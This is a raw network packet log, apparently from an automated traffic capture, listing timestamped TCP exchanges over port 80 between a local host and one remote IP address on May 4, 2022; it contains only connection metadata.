May 4, 2022 16:27:53.591850996 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591851950 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591881037 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591909885 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591938972 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591938972 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.591968060 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.591996908 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592003107 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.592025042 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592053890 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592056036 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.592077971 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592088938 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.592106104 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592133999 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592165947 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.592165947 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592195988 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592226028 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592226982 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.592268944 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592272043 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.592299938 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592323065 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.592334986 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.592400074 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.642851114 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.659950018 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934010029 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934067011 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934106112 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934146881 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934186935 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934225082 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934252977 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.934259892 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934302092 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934340000 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934380054 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934401035 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.934452057 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.934529066 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.934537888 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951416969 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951476097 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951536894 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951569080 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951596975 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951607943 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951613903 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951641083 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951642990 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951680899 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951690912 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951720953 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951721907 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951762915 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951771021 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951821089 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951832056 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951878071 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951893091 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951936960 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.951945066 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951984882 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.951987982 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952023983 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952024937 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952068090 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952071905 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952110052 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952116013 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952152014 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952166080 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952212095 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952224016 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952270031 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952275038 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952316046 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952317953 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952346087 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952364922 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952387094 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952394009 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952428102 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952430964 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952466011 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952507973 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952519894 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.952532053 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.952575922 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966340065 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966408014 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966420889 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966475964 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966480017 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966521978 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966538906 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966578960 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966598034 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966638088 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966667891 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966702938 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966718912 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966739893 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966752052 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966795921 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966800928 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966840029 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966849089 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966886997 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966897964 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966934919 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966947079 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.966984034 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.966995001 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.967029095 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.967034101 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.967067957 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.969260931 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.969315052 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.969321012 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.969364882 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.969364882 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.969398975 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.969419956 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.969446898 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.970865011 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.970917940 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.970926046 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.970966101 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.970974922 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971010923 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971014023 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971051931 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971055984 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971096039 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971101999 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971155882 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971157074 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971201897 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971203089 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971235037 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971246958 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971290112 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971290112 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971333027 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971338987 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971375942 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971378088 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971415997 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971420050 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971451044 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971458912 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971507072 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971673012 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971719027 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971720934 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971761942 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971767902 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971807957 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971811056 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971853971 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971857071 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971895933 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.971906900 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.971966982 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972050905 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972095966 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972100973 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972146988 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972150087 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972187996 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972193003 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972234011 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972242117 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972290039 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972290039 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972325087 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972337961 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972372055 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972382069 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972415924 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972421885 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972467899 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972496986 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972552061 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972584009 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.972587109 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972615957 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.972639084 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.983771086 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983803034 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983828068 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983838081 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.983849049 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983859062 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.983870029 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983877897 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.983892918 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983903885 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.983911037 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.983952999 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.984617949 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984643936 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984664917 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984678984 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.984688044 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984709978 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984730005 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.984733105 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984750032 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.984771967 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.984795094 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985099077 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985153913 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985160112 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985183954 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985202074 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985208988 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985227108 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985235929 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985245943 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985260963 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985274076 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985279083 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985300064 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985321045 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985637903 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985666990 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985686064 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985691071 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985707998 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985726118 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985728979 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985749960 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985763073 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985775948 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985790014 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985795021 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.985815048 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.985841990 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987004042 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987032890 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987055063 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987057924 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987092018 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987140894 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987152100 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987193108 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987329006 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987354040 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987377882 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987382889 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987402916 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987416983 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987427950 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987447023 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987484932 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987498999 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987517118 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:53.987541914 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:53.987565994 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005240917 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005280018 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005304098 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005327940 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005351067 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005352020 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005373955 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005386114 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005393028 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005417109 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005429029 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005438089 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005439997 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005464077 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005465031 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005481958 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005489111 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005503893 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005511999 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005518913 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005537033 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005554914 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005558968 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005578041 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
